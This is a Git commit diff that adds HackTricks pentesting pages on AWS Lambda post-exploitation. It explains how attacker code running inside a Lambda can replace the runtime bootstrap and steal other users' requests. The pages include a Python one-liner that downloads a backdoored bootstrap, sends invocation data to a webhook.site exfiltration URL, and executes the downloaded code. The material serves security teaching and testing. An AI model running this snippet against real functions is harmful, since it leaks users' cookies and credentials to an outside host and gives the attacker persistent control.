gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-30 06:30:35 -08:00
Code Issues Packages Projects Releases Wiki Activity

Migrate to using mdbook

Browse Source
This commit is contained in:
Congon4tor
2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md Normal file
View File

@@ -0,0 +1,29 @@
# AWS - Lambda Post Exploitation
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda
For more information check:
{{#ref}}
../../aws-services/aws-lambda-enum.md
{{#endref}}
### Steal Others Lambda URL Requests
If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
{{#ref}}
aws-warm-lambda-persistence.md
{{#endref}}
### Steal Others Lambda URL Requests & Extensions Requests
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
{{#ref}}
../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
{{#endref}}
{{#include ../../../../banners/hacktricks-training.md}}

63
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md Normal file
View File

@@ -0,0 +1,63 @@
# AWS - Steal Lambda Requests
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda Flow
<figure><img src="../../../../images/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a></p></figcaption></figure>
1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
2. The init process listens on port **9001** exposing some interesting endpoints:
- **`/2018-06-01/runtime/invocation/next`** get the next invocation event
- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** return the handler response for the invoke
- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** return an execution error
3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
4. Finally, **bootstrap.py** sends to init the **response**
Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
## Stealing Lambda Requests
The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
- A request must be sent to **`/${invoke-id}/response`**
- The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
- Execute a malicious **`boostrap.py`** which will handle the next invocations
- For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
- For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
### Attack Steps
1. Find a **RCE** vulnerability.
2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
3. **Execute** the malicious bootstrap.
You can easily perform these actions running:
```bash
python3 <<EOF
import os
import urllib3
# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data
# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"
exec(new_runtime)
EOF
```
For more info check [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
## References
- [https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
{{#include ../../../../banners/hacktricks-training.md}}